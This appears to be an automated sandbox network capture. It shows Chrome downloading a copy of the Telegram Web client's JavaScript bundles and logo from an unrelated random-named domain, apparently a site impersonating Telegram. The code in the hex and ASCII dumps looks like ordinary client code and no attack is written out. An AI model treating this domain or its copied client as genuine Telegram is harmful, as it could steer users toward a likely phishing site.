                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:46 UTC927INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:45 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-92ae6"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6952
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEQUMRSyz9eykpRVkWTu9CjrtUDrJWSbAoCYq%2B7vTUFmRfEzs5lFcJ5wrqiVkQO%2F4os%2F61l%2FBCo5kVrfut4mWm3lx2d8uHqXqS6%2F2B1cLw7zHEPvRZ7M4lvVSJrTSB72MoMizQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a4389d5e7a-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2238&min_rtt=2224&rtt_var=862&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=947&delivery_rate=1249465&cwnd=221&unsent_bytes=0&cid=d78342b0d2507778&ts=154&x=0"
                                  2025-01-12 00:03:46 UTC442INData Raw: 37 63 64 37 0d 0a 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 73 3d 7b 36 34 35 33 3a 28 65 2c 74 2c 73 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 6e 7d 29 3b 63 6c 61 73 73 20 6e 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 69 73 55 70 6c 6f 61 64 3d 65 7d 7d 7d 2c 33 35 35 39 3a 28 65 2c 74 2c 73 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 7b 7d 3b 73 2e 72 28 6e 29 2c 73 2e 64 28 6e 2c 7b 54 79 70 65 3a 28 29 3d 3e 5f 6f 2c 63 6c 65 61 72 3a 28 29 3d 3e 53 6f 2c 66 65 74 63 68 3a 28 29 3d 3e 62 6f 2c 69 73 43 61 63 68 65 41 70 69 53 75 70 70 6f 72 74 65 64 3a 28 29 3d 3e 79 6f 2c 72 65 6d 6f 76 65 3a 28 29 3d 3e 76 6f 2c 73 61 76 65 3a 28 29 3d 3e 77 6f 7d 29 3b 76
                                  Data Ascii: 7cd7(()=>{var e,t,s={6453:(e,t,s)=>{"use strict";s.d(t,{A:()=>n});class n{constructor(e){this.isUpload=e}}},3559:(e,t,s)=>{"use strict";var n={};s.r(n),s.d(n,{Type:()=>_o,clear:()=>So,fetch:()=>bo,isCacheApiSupported:()=>yo,remove:()=>vo,save:()=>wo});v
                                  2025-01-12 00:03:46 UTC1369INData Raw: 66 2c 61 64 64 43 68 61 74 4d 65 6d 62 65 72 73 3a 28 29 3d 3e 77 72 2c 61 6c 6c 6f 77 42 6f 74 53 65 6e 64 4d 65 73 73 61 67 65 73 3a 28 29 3d 3e 74 70 2c 61 6e 73 77 65 72 43 61 6c 6c 62 61 63 6b 42 75 74 74 6f 6e 3a 28 29 3d 3e 44 6c 2c 61 70 70 6c 79 42 6f 6f 73 74 3a 28 29 3d 3e 4c 66 2c 61 70 70 6c 79 47 69 66 74 43 6f 64 65 3a 28 29 3d 3e 24 66 2c 62 6c 6f 63 6b 55 73 65 72 3a 28 29 3d 3e 71 75 2c 62 72 6f 61 64 63 61 73 74 4c 6f 63 61 6c 44 62 55 70 64 61 74 65 46 75 6c 6c 3a 28 29 3d 3e 44 65 2c 63 68 61 6e 67 65 53 65 73 73 69 6f 6e 53 65 74 74 69 6e 67 73 3a 28 29 3d 3e 78 64 2c 63 68 61 6e 67 65 53 65 73 73 69 6f 6e 54 74 6c 3a 28 29 3d 3e 56 64 2c 63 68 61 6e 67 65 53 74 61 72 73 53 75 62 73 63 72 69 70 74 69 6f 6e 3a 28 29 3d 3e 72 67 2c 63
                                  Data Ascii: f,addChatMembers:()=>wr,allowBotSendMessages:()=>tp,answerCallbackButton:()=>Dl,applyBoost:()=>Lf,applyGiftCode:()=>$f,blockUser:()=>qu,broadcastLocalDbUpdateFull:()=>De,changeSessionSettings:()=>xd,changeSessionTtl:()=>Vd,changeStarsSubscription:()=>rg,c
                                  2025-01-12 00:03:46 UTC1369INData Raw: 64 69 74 45 78 70 6f 72 74 65 64 43 68 61 74 49 6e 76 69 74 65 3a 28 29 3d 3e 5f 75 2c 65 64 69 74 47 72 6f 75 70 43 61 6c 6c 50 61 72 74 69 63 69 70 61 6e 74 3a 28 29 3d 3e 64 70 2c 65 64 69 74 47 72 6f 75 70 43 61 6c 6c 54 69 74 6c 65 3a 28 29 3d 3e 75 70 2c 65 64 69 74 4d 65 73 73 61 67 65 3a 28 29 3d 3e 73 63 2c 65 64 69 74 53 74 6f 72 79 50 72 69 76 61 63 79 3a 28 29 3d 3e 6b 66 2c 65 64 69 74 54 6f 70 69 63 3a 28 29 3d 3e 78 72 2c 65 6e 63 6f 64 65 50 68 6f 6e 65 43 61 6c 6c 44 61 74 61 3a 28 29 3d 3e 75 66 2c 65 78 70 6f 72 74 43 68 61 74 49 6e 76 69 74 65 3a 28 29 3d 3e 62 75 2c 65 78 70 6f 72 74 47 72 6f 75 70 43 61 6c 6c 49 6e 76 69 74 65 3a 28 29 3d 3e 6c 70 2c 65 78 70 6f 72 74 4d 65 73 73 61 67 65 4c 69 6e 6b 3a 28 29 3d 3e 51 63 2c 66 61 76
                                  Data Ascii: ditExportedChatInvite:()=>_u,editGroupCallParticipant:()=>dp,editGroupCallTitle:()=>up,editMessage:()=>sc,editStoryPrivacy:()=>kf,editTopic:()=>xr,encodePhoneCallData:()=>uf,exportChatInvite:()=>bu,exportGroupCallInvite:()=>lp,exportMessageLink:()=>Qc,fav
                                  2025-01-12 00:03:46 UTC1369INData Raw: 72 73 3a 28 29 3d 3e 4c 64 2c 66 65 74 63 68 46 75 6c 6c 43 68 61 74 3a 28 29 3d 3e 44 6f 2c 66 65 74 63 68 46 75 6c 6c 55 73 65 72 3a 28 29 3d 3e 58 63 2c 66 65 74 63 68 47 65 6e 65 72 69 63 45 6d 6f 6a 69 45 66 66 65 63 74 73 3a 28 29 3d 3e 59 64 2c 66 65 74 63 68 47 69 76 65 61 77 61 79 49 6e 66 6f 3a 28 29 3d 3e 7a 66 2c 66 65 74 63 68 47 6c 6f 62 61 6c 50 72 69 76 61 63 79 53 65 74 74 69 6e 67 73 3a 28 29 3d 3e 6d 6c 2c 66 65 74 63 68 47 72 6f 75 70 43 61 6c 6c 50 61 72 74 69 63 69 70 61 6e 74 73 3a 28 29 3d 3e 70 70 2c 66 65 74 63 68 47 72 6f 75 70 53 74 61 74 69 73 74 69 63 73 3a 28 29 3d 3e 6a 70 2c 66 65 74 63 68 47 72 6f 75 70 73 46 6f 72 44 69 73 63 75 73 73 69 6f 6e 3a 28 29 3d 3e 6d 72 2c 66 65 74 63 68 49 6e 6c 69 6e 65 42 6f 74 3a 28 29 3d
                                  Data Ascii: rs:()=>Ld,fetchFullChat:()=>Do,fetchFullUser:()=>Xc,fetchGenericEmojiEffects:()=>Yd,fetchGiveawayInfo:()=>zf,fetchGlobalPrivacySettings:()=>ml,fetchGroupCallParticipants:()=>pp,fetchGroupStatistics:()=>jp,fetchGroupsForDiscussion:()=>mr,fetchInlineBot:()=
                                  2025-01-12 00:03:46 UTC1369INData Raw: 53 65 65 6e 42 79 3a 28 29 3d 3e 44 63 2c 66 65 74 63 68 53 65 6e 64 41 73 3a 28 29 3d 3e 55 63 2c 66 65 74 63 68 53 70 6f 6e 73 6f 72 65 64 4d 65 73 73 61 67 65 73 3a 28 29 3d 3e 56 63 2c 66 65 74 63 68 53 74 61 72 47 69 66 74 73 3a 28 29 3d 3e 59 66 2c 66 65 74 63 68 53 74 61 72 73 47 69 76 65 61 77 61 79 4f 70 74 69 6f 6e 73 3a 28 29 3d 3e 58 66 2c 66 65 74 63 68 53 74 61 72 73 53 74 61 74 75 73 3a 28 29 3d 3e 6e 67 2c 66 65 74 63 68 53 74 61 72 73 53 75 62 73 63 72 69 70 74 69 6f 6e 73 3a 28 29 3d 3e 6f 67 2c 66 65 74 63 68 53 74 61 72 73 54 6f 70 75 70 4f 70 74 69 6f 6e 73 3a 28 29 3d 3e 64 67 2c 66 65 74 63 68 53 74 61 72 73 54 72 61 6e 73 61 63 74 69 6f 6e 42 79 49 64 3a 28 29 3d 3e 69 67 2c 66 65 74 63 68 53 74 61 72 73 54 72 61 6e 73 61 63 74 69
                                  Data Ascii: SeenBy:()=>Dc,fetchSendAs:()=>Uc,fetchSponsoredMessages:()=>Vc,fetchStarGifts:()=>Yf,fetchStarsGiveawayOptions:()=>Xf,fetchStarsStatus:()=>ng,fetchStarsSubscriptions:()=>og,fetchStarsTopupOptions:()=>dg,fetchStarsTransactionById:()=>ig,fetchStarsTransacti
                                  2025-01-12 00:03:46 UTC1369INData Raw: 3a 28 29 3d 3e 50 75 2c 69 6d 70 6f 72 74 43 68 61 74 49 6e 76 69 74 65 3a 28 29 3d 3e 50 72 2c 69 6d 70 6f 72 74 43 6f 6e 74 61 63 74 3a 28 29 3d 3e 6e 64 2c 69 6e 73 74 61 6c 6c 53 74 69 63 6b 65 72 53 65 74 3a 28 29 3d 3e 69 75 2c 69 6e 76 6f 6b 65 57 65 62 56 69 65 77 43 75 73 74 6f 6d 4d 65 74 68 6f 64 3a 28 29 3d 3e 73 70 2c 6a 6f 69 6e 43 68 61 6e 6e 65 6c 3a 28 29 3d 3e 4f 6f 2c 6a 6f 69 6e 43 68 61 74 6c 69 73 74 49 6e 76 69 74 65 3a 28 29 3d 3e 4e 72 2c 6a 6f 69 6e 47 72 6f 75 70 43 61 6c 6c 3a 28 29 3d 3e 67 70 2c 6a 6f 69 6e 47 72 6f 75 70 43 61 6c 6c 50 72 65 73 65 6e 74 61 74 69 6f 6e 3a 28 29 3d 3e 6d 70 2c 6c 61 75 6e 63 68 50 72 65 70 61 69 64 47 69 76 65 61 77 61 79 3a 28 29 3d 3e 73 67 2c 6c 65 61 76 65 43 68 61 6e 6e 65 6c 3a 28 29 3d
                                  Data Ascii: :()=>Pu,importChatInvite:()=>Pr,importContact:()=>nd,installStickerSet:()=>iu,invokeWebViewCustomMethod:()=>sp,joinChannel:()=>Oo,joinChatlistInvite:()=>Nr,joinGroupCall:()=>gp,joinGroupCallPresentation:()=>mp,launchPrepaidGiveaway:()=>sg,leaveChannel:()=
                                  2025-01-12 00:03:46 UTC1369INData Raw: 3a 28 29 3d 3e 71 6c 2c 72 65 73 63 68 65 64 75 6c 65 4d 65 73 73 61 67 65 3a 28 29 3d 3e 6e 63 2c 72 65 73 6f 6c 76 65 42 75 73 69 6e 65 73 73 43 68 61 74 4c 69 6e 6b 3a 28 29 3d 3e 4e 64 2c 72 65 73 74 61 72 74 41 75 74 68 3a 28 29 3d 3e 66 6f 2c 72 65 73 74 61 72 74 41 75 74 68 57 69 74 68 51 72 3a 28 29 3d 3e 67 6f 2c 73 61 76 65 43 6c 6f 73 65 46 72 69 65 6e 64 73 3a 28 29 3d 3e 64 64 2c 73 61 76 65 44 65 66 61 75 6c 74 53 65 6e 64 41 73 3a 28 29 3d 3e 78 63 2c 73 61 76 65 44 72 61 66 74 3a 28 29 3d 3e 46 6f 2c 73 61 76 65 47 69 66 3a 28 29 3d 3e 61 75 2c 73 61 76 65 53 74 61 72 47 69 66 74 3a 28 29 3d 3e 65 67 2c 73 65 61 72 63 68 43 68 61 74 73 3a 28 29 3d 3e 78 6f 2c 73 65 61 72 63 68 47 69 66 73 3a 28 29 3d 3e 63 75 2c 73 65 61 72 63 68 48 61 73
                                  Data Ascii: :()=>ql,rescheduleMessage:()=>nc,resolveBusinessChatLink:()=>Nd,restartAuth:()=>fo,restartAuthWithQr:()=>go,saveCloseFriends:()=>dd,saveDefaultSendAs:()=>xc,saveDraft:()=>Fo,saveGif:()=>au,saveStarGift:()=>eg,searchChats:()=>xo,searchGifs:()=>cu,searchHas
                                  2025-01-12 00:03:46 UTC1369INData Raw: 29 3d 3e 4d 72 2c 74 6f 67 67 6c 65 4a 6f 69 6e 52 65 71 75 65 73 74 3a 28 29 3d 3e 49 72 2c 74 6f 67 67 6c 65 4a 6f 69 6e 54 6f 53 65 6e 64 3a 28 29 3d 3e 53 72 2c 74 6f 67 67 6c 65 50 61 72 74 69 63 69 70 61 6e 74 73 48 69 64 64 65 6e 3a 28 29 3d 3e 52 72 2c 74 6f 67 67 6c 65 50 65 65 72 54 72 61 6e 73 6c 61 74 69 6f 6e 73 3a 28 29 3d 3e 6a 72 2c 74 6f 67 67 6c 65 50 69 6e 6e 65 64 54 6f 70 69 63 3a 28 29 3d 3e 55 72 2c 74 6f 67 67 6c 65 50 72 65 48 69 73 74 6f 72 79 48 69 64 64 65 6e 3a 28 29 3d 3e 72 72 2c 74 6f 67 67 6c 65 53 61 76 65 64 44 69 61 6c 6f 67 50 69 6e 6e 65 64 3a 28 29 3d 3e 51 6f 2c 74 6f 67 67 6c 65 53 69 67 6e 61 74 75 72 65 73 3a 28 29 3d 3e 66 72 2c 74 6f 67 67 6c 65 53 70 6f 6e 73 6f 72 65 64 4d 65 73 73 61 67 65 73 3a 28 29 3d 3e
                                  Data Ascii: )=>Mr,toggleJoinRequest:()=>Ir,toggleJoinToSend:()=>Sr,toggleParticipantsHidden:()=>Rr,togglePeerTranslations:()=>jr,togglePinnedTopic:()=>Ur,togglePreHistoryHidden:()=>rr,toggleSavedDialogPinned:()=>Qo,toggleSignatures:()=>fr,toggleSponsoredMessages:()=>
                                  2025-01-12 00:03:46 UTC1369INData Raw: 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2c 32 30 29 2c 6d 3d 32 30 30 2c 79 3d 35 30 2c 5f 3d 31 30 30 2c 62 3d 31 30 30 2c 77 3d 31 30 30 2c 76 3d 31 30 30 2c 53 3d 35 30 2c 49 3d 31 30 30 2c 41 3d 35 30 2c 50 3d 31 30 30 2c 43 3d 31 30 30 2c 4d 3d 31 30 30 2c 52 3d 32 30 2c 6b 3d 33 65 35 2c 54 3d 22 58 54 52 22 2c 45 3d 32 2a 2a 33 31 2d 31 2c 42 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 34 35 30 29 2c 44 3d 6e 65 77 20 53 65 74 28 5b 22 6e 65 77 4d 65 73 73 61 67 65 22 2c 22 6e 65 77 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 22 2c 22 64 65 6c 65 74 65 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 48 69 73 74 6f 72 79 22 5d 29 2c 55 3d
                                  Data Ascii: indow&&window.innerHeight,20),m=200,y=50,_=100,b=100,w=100,v=100,S=50,I=100,A=50,P=100,C=100,M=100,R=20,k=3e5,T="XTR",E=2**31-1,B=Math.round(450),D=new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),U=
                                  2025-01-12 00:03:46 UTC1369INData Raw: 74 20 73 2c 6e 2c 61 2c 69 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 3b 66 6f 72 28 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 6f 29 2c 63 3d 30 3b 63 3c 6f 3b 63 2b 2b 29 72 5b 63 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 61 3d 72 2c 73 7c 7c 28 69 26 26 28 6e 3d 21 31 2c 65 28 2e 2e 2e 61 29 29 2c 73 3d 73 65 6c 66 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 28 28 29 3d 3e 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 73 65 6c 66 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 73 29 2c 76 6f 69 64 28
                                  Data Ascii: t s,n,a,i=!(arguments.length>2&&void 0!==arguments[2])||arguments[2];return function(){n=!0;for(var o=arguments.length,r=new Array(o),c=0;c<o;c++)r[c]=arguments[c];a=r,s||(i&&(n=!1,e(...a)),s=self.setInterval((()=>{if(!n)return self.clearInterval(s),void(


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.649810172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:46 UTC646OUTGET /telegram-logo.1b2bb5b107f046ea9325.svg HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.css
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:46 UTC899INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:46 GMT
                                  Content-Type: image/svg+xml
                                  Content-Length: 932
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-3a4"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6954
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMU96GQJXl1WVvA7CsfRxqMMLxJ3%2BlbQs8L4uinrfRbKuX64yepwntPPIaEp0MBSmz0pZXHJpIzfXqfvXTs0i0IiBpfyAGf93ij5gnU5HmhicTMelnfdxl1GdKhDApb7Etn0Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a73ff28cc6-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1863&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1224&delivery_rate=1567364&cwnd=222&unsent_bytes=0&cid=9aad653d656ab988&ts=156&x=0"
                                  2025-01-12 00:03:46 UTC470INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 30 20 31 32 30 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 35 30 25 22 20 79 31 3d 22 30 25 22 20 78 32 3d 22 35 30 25 22 20 79 32 3d 22 31 30 30 25 22 20 69 64 3d 22 61 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 33 38 41 45 45 42 22 20 6f 66 66 73 65 74 3d 22 30 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 32 37 39 41 44 31 22 20 6f 66 66 73 65 74 3d 22 31 30 30 25 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 2f 64 65 66 73 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 63 69 72 63 6c 65
                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 120"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="a"><stop stop-color="#38AEEB" offset="0%"/><stop stop-color="#279AD1" offset="100%"/></linearGradient></defs><g fill="none"><circle
                                  2025-01-12 00:03:46 UTC462INData Raw: 32 2e 39 36 33 2d 31 2e 30 31 33 20 31 30 2e 32 30 37 2d 34 2e 38 36 20 33 33 2e 37 38 2d 37 2e 30 38 38 20 34 35 2e 32 32 35 2d 2e 39 34 35 20 34 2e 38 33 37 2d 32 2e 38 30 35 20 36 2e 34 35 37 2d 34 2e 36 30 35 20 36 2e 36 31 35 2d 33 2e 39 30 37 2e 33 34 35 2d 36 2e 38 37 37 2d 32 2e 34 37 35 2d 31 30 2e 36 36 34 2d 34 2e 38 36 2d 35 2e 39 32 35 2d 33 2e 37 32 38 2d 37 2e 39 30 35 2d 35 2e 31 2d 31 33 2e 36 35 2d 38 2e 37 33 37 2d 36 2e 36 35 33 2d 34 2e 32 2d 33 2e 39 31 36 2d 35 2e 36 36 33 2d 2e 31 32 38 2d 39 2e 34 33 36 2e 39 39 2d 2e 39 38 32 20 31 37 2e 34 31 35 2d 31 35 2e 39 37 34 20 31 37 2e 36 36 32 2d 31 37 2e 33 34 2e 32 31 2d 31 2e 32 2e 32 38 36 2d 31 2e 33 35 37 2d 2e 32 35 34 2d 31 2e 38 39 37 2d 2e 35 34 38 2d 2e 35 34 2d 31 2e 32 2d
                                  Data Ascii: 2.963-1.013 10.207-4.86 33.78-7.088 45.225-.945 4.837-2.805 6.457-4.605 6.615-3.907.345-6.877-2.475-10.664-4.86-5.925-3.728-7.905-5.1-13.65-8.737-6.653-4.2-3.916-5.663-.128-9.436.99-.982 17.415-15.974 17.662-17.34.21-1.2.286-1.357-.254-1.897-.548-.54-1.2-


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.649811172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:46 UTC547OUTGET /8673.1b6dd8d303b0535cc1f8.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:46 UTC921INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:46 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-29c8"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6951
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppRtu9rMA0316Bns3xU9gNSVMi289PZEWAuIfvGgZIs28BEBvXxLKhkh498UoLakYpiOU4eDCc4fe7MxgZT9X3139vQqSan0qqV%2F%2BmYLWOxgcSRYfAq2zi8MI6zGH2c1AhAHog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a7390dc359-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1522&rtt_var=571&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1125&delivery_rate=1917268&cwnd=234&unsent_bytes=0&cid=386800520173ff21&ts=149&x=0"
                                  2025-01-12 00:03:46 UTC448INData Raw: 32 39 63 38 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 36 37 33 5d 2c 7b 38 36 37 33 3a 28 65 2c 74 2c 73 29 3d 3e 7b 73 2e 72 28 74 29 2c 73 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 53 7d 29 3b 76 61 72 20 69 3d 73 28 39 38 32 32 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2f 65 29 2a 65 7d 76 61 72 20 61 3d 73 28 39 37 30 35 29 2c 6e 3d 73 28 34 32 33 35 29 2c 6f 3d 73 28 31 34 38 31 29 2c 68 3d 73 28 37 38 33 36 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74
                                  Data Ascii: 29c8"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[8673],{8673:(e,t,s)=>{s.r(t),s.d(t,{default:()=>S});var i=s(9822);function r(e,t){return t-Math.floor(t/e)*e}var a=s(9705),n=s(4235),o=s(1481),h=s(7836);function d(e,t
                                  2025-01-12 00:03:46 UTC1369INData Raw: 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 40 40 74 6f 50 72 69 6d 69 74 69 76 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 20 70 72 69 6d 69 74 69 76 65 20 76 61 6c 75 65 2e 22 29 7d 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 65 29 7d 28 74 29 29 3f 69 3a 69 2b 22 22 29 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 73 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 73 2c 65 7d 63 6c 61 73 73 20 63 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 73 29 7b 74 68 69 73 2e 74 61 72 67 65 74 3d 65 2c 74 68 69 73 2e 6f 6e 55 70 64 61 74 65 3d 74 2c 74 68 69 73 2e 63 68 61 6e 6e 65 6c 3d 73 2c
                                  Data Ascii: ew TypeError("@@toPrimitive must return a primitive value.")}return String(e)}(t))?i:i+"")in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e}class c{constructor(e,t,s){this.target=e,this.onUpdate=t,this.channel=s,
                                  2025-01-12 00:03:46 UTC1369INData Raw: 65 49 64 3a 74 7d 29 7d 6f 6e 4d 65 73 73 61 67 65 28 65 29 7b 63 6f 6e 73 74 7b 72 65 71 75 65 73 74 53 74 61 74 65 73 3a 74 2c 63 68 61 6e 6e 65 6c 3a 73 7d 3d 74 68 69 73 3b 65 2e 63 68 61 6e 6e 65 6c 3d 3d 3d 73 26 26 65 2e 70 61 79 6c 6f 61 64 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 69 66 28 22 75 70 64 61 74 65 22 3d 3d 3d 65 2e 74 79 70 65 26 26 74 68 69 73 2e 6f 6e 55 70 64 61 74 65 26 26 74 68 69 73 2e 6f 6e 55 70 64 61 74 65 28 65 2e 75 70 64 61 74 65 29 2c 22 6d 65 74 68 6f 64 52 65 73 70 6f 6e 73 65 22 3d 3d 3d 65 2e 74 79 70 65 29 7b 63 6f 6e 73 74 20 73 3d 74 2e 67 65 74 28 65 2e 6d 65 73 73 61 67 65 49 64 29 3b 73 26 26 28 65 2e 65 72 72 6f 72 3f 73 2e 72 65 6a 65 63 74 28 65 2e 65 72 72 6f 72 29 3a 73 2e 72 65 73 6f 6c 76 65 28 65 2e
                                  Data Ascii: eId:t})}onMessage(e){const{requestStates:t,channel:s}=this;e.channel===s&&e.payloads.forEach((e=>{if("update"===e.type&&this.onUpdate&&this.onUpdate(e.update),"methodResponse"===e.type){const s=t.get(e.messageId);s&&(e.error?s.reject(e.error):s.resolve(e.
